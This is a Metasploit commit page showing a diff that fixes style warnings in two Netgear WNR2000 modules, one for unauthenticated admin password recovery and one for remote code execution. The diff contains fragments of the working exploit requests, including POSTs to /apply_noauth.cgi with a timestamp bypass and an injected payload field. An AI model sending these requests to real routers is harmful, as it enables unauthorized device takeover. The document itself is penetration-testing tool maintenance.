Skip to content

Commit 7355817

Browse files
author
Brent Cook
committed
Land rapid7#8371, Fix msftidy warnings for the WNR2000 module
2 parents 142f190 + 2315100 commit 7355817

File tree

2 files changed

+14
-10
lines changed

2 files changed

+14
-10
lines changed

modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb

Lines changed: 9 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -98,7 +98,8 @@ def get_creds
9898

9999
# 1: send serial number
100100
send_request_cgi({
101-
'uri' => '/apply_noauth.cgi?/unauth.cgi',
101+
'uri' => '/apply_noauth.cgi',
102+
'query' => '/unauth.cgi',
102103
'method' => 'POST',
103104
'Content-Type' => 'application/x-www-form-urlencoded',
104105
'vars_post' =>
@@ -111,7 +112,8 @@ def get_creds
111112

112113
# 2: send answer to secret questions
113114
send_request_cgi({
114-
'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
115+
'uri' => '/apply_noauth.cgi',
116+
'query' => '/securityquestions.cgi',
115117
'method' => 'POST',
116118
'Content-Type' => 'application/x-www-form-urlencoded',
117119
'vars_post' =>
@@ -176,11 +178,12 @@ def report_cred(opts)
176178

177179
def send_req(timestamp)
178180
begin
179-
uri_str = (timestamp == nil ? \
180-
"/apply_noauth.cgi?/PWD_password.htm" : \
181-
"/apply_noauth.cgi?/PWD_password.htm%20timestamp=#{timestamp.to_s}")
181+
query_str = (timestamp == nil ? \
182+
'/PWD_password.htm' : \
183+
"/PWD_password.htm%20timestamp=#{timestamp.to_s}")
182184
res = send_request_raw({
183-
'uri' => uri_str,
185+
'uri' => '/apply_noauth.cgi',
186+
'query' => query_str,
184187
'method' => 'POST',
185188
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
186189
'data' => "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=#{@q1}&question2=2&answer2=#{@q2}"

modules/exploits/linux/http/netgear_wnr2000_rce.rb

Lines changed: 5 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -174,11 +174,12 @@ def get_payload
174174

175175
def send_req(timestamp)
176176
begin
177-
uri_str = (timestamp == nil ? \
178-
"/apply_noauth.cgi?/lang_check.html" : \
179-
"/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}")
177+
query_str = (timestamp == nil ? \
178+
'/lang_check.html' : \
179+
"/lang_check.html%20timestamp=#{timestamp.to_s}")
180180
res = send_request_raw({
181-
'uri' => uri_str,
181+
'uri' => '/apply_noauth.cgi',
182+
'query' => query_str,
182183
'method' => 'POST',
183184
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
184185
'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"

0 commit comments

Comments
 (0)